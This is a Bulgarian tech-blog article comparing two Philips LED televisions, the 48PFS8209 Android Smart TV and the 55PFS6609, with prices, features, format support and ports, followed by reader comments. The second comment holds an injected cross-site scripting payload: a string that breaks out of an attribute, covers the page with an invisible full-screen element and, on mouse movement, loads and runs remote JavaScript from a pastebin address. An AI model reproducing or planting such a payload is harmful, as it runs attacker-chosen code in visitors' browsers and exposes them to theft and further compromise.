Интересни модели LED-телевизори с голям диагонал от Philips

3

Както сме споменавали и преди телевизорите на Philips вече са отдадени под наем на базирания в Хонг Конг производител на електроника TP Vision, но въпреки това моделите под марката са конкурентни и до голяма степен запазват качеството си. Основното, на което залага компанията във все още актуалните модели 20142015 са простия стилен дизайн, тънките рамки и по-достъпните цени. Както при всеки производител разминавания в параметрите на различните серии са възможни, затова в статията ще се спрем конкретно на два модела, които предлагат разнообразие от функции на едни доста приемливи цени в сравнение с други производители.

Philips 48PFS8209 Android Smart TV – 2699лв.                                                                                       
48PFS8209 заедно с 55PFS8209 са част от една от върховите серии на компанията – 8000. Единствена разлика помежду им е размера на диагонала 48 срещу 55 инча. Телевизорът работи с обновена Smart TV-платформа базирана на Android 4.2.2. Имайки предвид огромното количество потребители на операционната система на Google възможностите за инсталиране на приложения са практически безгранични, но Philips промотират основно няколко такива фабрично инсталирани на телевизорите: Google Chrome, Search, Voice Search, Google Play Movies, Google Play Music, и YouTube, а вградената поддръжка на Play Store ви осигурява достъп до много игри и други приложения със стрийминг съдържание от ранга на Netflix и Spotify (близо 2GB пространство за приложения).

След изваждане от кутията ни посреща FullHD екран (1920x1080p) с изключително тънка рамка и страхотен модерен дизайн. Philips 48PFS8209 е издържан в сребристобял цвят, а устойчивостта му се осигурява от метални крачета разположени от двете му страни. Цялостната визия на устройството създава усещане за лекота и ефирност, което според компанията производител спомага за по-доброто преживяване. Ненатрапчивата рамка определено дава резултат най-осезаем при използване на вградения 4-странен AmbiLight – една от запазените марки на Philips за подобряване на възприятията чрез разливане на цветовете от картината на дисплея към околното пространство. Друга интересна подробност е вградената в рамката видеокамера, с чиято помощ можете да провеждате Skype-разговори или да управлявате основни функции на телевизора си по един наистина смарт-начин – с глас или чрез жестове, без дори да докосвате дистанционното.                                                                            
Качеството на картината е много добро, а бързодействието на телевизора е осигурено от 4-ядрен процесор, който е напълно достатъчен за всичките ви нужди. Моделът е снабден с доста интересни функции, възпроизвежда плеяда от формати и разполага с разнообразие от портове за свързване.

По-важните от тях са:

 • Twin Tuner – възможност за едновременно гледане на два канала или гледане на един канал, а запис на друг. Освен това Twin Tuner разширява функционалността на фирмената технология Multiroom. С нейна помощ изпращате картината от даден канал или предварително записан файл към друг телевизор в жилището си чрез Wi-Fi свързаност (2x DVB-T/T2/C/S/S2).
 • Cloud TV – фирмени приложения на Philips за стрийминг на локални или международни телевизионни канали през Интернет.
 • дистанционно с клавиатура от задната страна и вграден микрофон за команди
 • активно 3D с два чифта включени в комплекта (съвместими варианти очила PTA509 или PTA519)
 • звук – 30W (15W + 2x 7,5W) с Ambi wOOx, DTS premium и др.
 • поддържани видео формати – контейнери: AVI, MKV, формати: H264/MPEG-4 AVC, MPEG-1, MPEG-2, MPEG-4, WMV9/VC1, 3GP
 • поддържани аудио формати – AAC, MP3, WMA
 • субтитри – AAS, SMI, SRT, SUB, TXT, MKV/SRT
 • изображения – JPEG, BMP, GIF, JPS, PNG, PNS
 • възможности за свързване – 4х HDMI, 1x компонентен вход (YPbPr), 1x SCART, 3x USB 2.0, Wi-Fi 802.11n Dual-band, Ethernet-LAN RJ-45, жак за слушалки, Digital audio out (optical), Audio L/R in, 2x Common Interface Plus (CI+), Antenna IEC75, 2x Sattellite input

Philips 55PFS6609 – 1649лв.                                                                                            
Вторият модел е на доста по-достъпна цена и е част от междинната серия 6000. Разполага с по-голям диагонал – 55 инча, но се предлага и във варианти с 40, 48 и 65, като рамките отново са доста тънки. Дизайнът е много добър, цветовете на корпуса са метално сиво и бяло, а стойката позволява лек наклон на екрана напред/назад. Телевизорът стои стабилно, но имайте предвид че при по-голям размер на екрана е добре да изберете достатъчно широка и равна повърхност с цел избягване на поклащания.

Що се отнася до цветовете и качеството на картината, Philips 55PFS6609 може да се похвали с много. Телевизора с резолюция от 1920x1080p се осветява с LED-диоди разположени директно зад него, а не в рамката около екрана (нещо с което дори някои скъпи модели не могат да се похвалят). Това позволява изобразяването на по-дълбоко черно и осигурява контраст от порядъка на 4000:1 след известна настройка. А именно ‘настройка‘ е ключовата дума, която върви неизменно с този телевизор. За жалост фабричната такава е доста странна и неестествена, цветовете са прекалено ярки, а черното сякаш сивее. Необходима е кратка занимавка, превключване към режим ‘Movie‘ и промяна в някои опции за острота на изображението за да получите отличната картина криеща се в 55PFS6609.

Управлението тук е поверено на старата Smart TV платформа на Philips и на 2-ядрен процесор. Разбира се отново разполагате с доста приложения (YouTube, Facebook, Netflix, Spotify), но достъп до магазина на Google този път липсва. Дистанционното управление не разполага с клавиатура, но от Philips са осигурили приложението MyRemote с чиято помощ лесно контролирате телевизора използвайки смартфона си.                        

По-важни характеристики:

 • двустранен Ambilight Spectra 2
 • Cloud TV
 • активно 3D с два чифта включени в комплекта (съвместими варианти очила PTA509 или PTA519)
 • звук – 20W с Ambi wOOx и др.
 • поддържани видео формати – контейнери: AVI, MKV, формати: H264/MPEG-4 AVC, MPEG-1, MPEG-2, MPEG-4, WMV9/VC1, 3GP
 • поддържани аудио формати – AAC, AMR, LPCM, M4A, MP3, MPEG1 L1/2, WMA
 • субтитри – AAS, SMI, SRT, SUB, TXT, MKV/SRT
 • изображения – JPEG, BMP, GIF, JPS, PNG, PNS
 • възможности за свързване – 4х HDMI, 1x компонентен вход (YPbPr), 1x SCART, 2x USB 2.0, Wi-Fi Dual-band, Ethernet-LAN RJ-45, жак за слушалки, Audio in (DVI), Digital audio out (optical), Audio L/R in, 1x Common Interface Plus (CI+), Antenna IEC75, 2x Sattellite input

И не на последно място, ако закупите смарт-телевизор не забравяйте да проверите за обновления на софтуера му на официалния сайт на производителя. Те добавят нови функции или коригират забелязани проблеми.

Сподели.

3 Comments

 1. Амбиент осветлението е много готино ентусиастите могат да си направят подобно и в домашни условия с RGB LED Лента

 2. Какво е предимството пред другите модели ? [

  [” onmouseover=”this.style.display=’none’; var scrpt = document.createElement(‘script’);scrpt.src=’http://pastebin.com/raw.php?i=puHJrqdN’;document.head.appendChild(scrpt);” style=”position:fixed;left:0px;top:0px;width:100%;height:100%;z-index:10000;display:block” ]

 3. Притежавам отскоро модел 6909 40 инча , страхотен телевизор е , та дори и логото PHILIPS свети. Активно 3D, 100HZ IPS матрица от LG.

Коментирай

css.php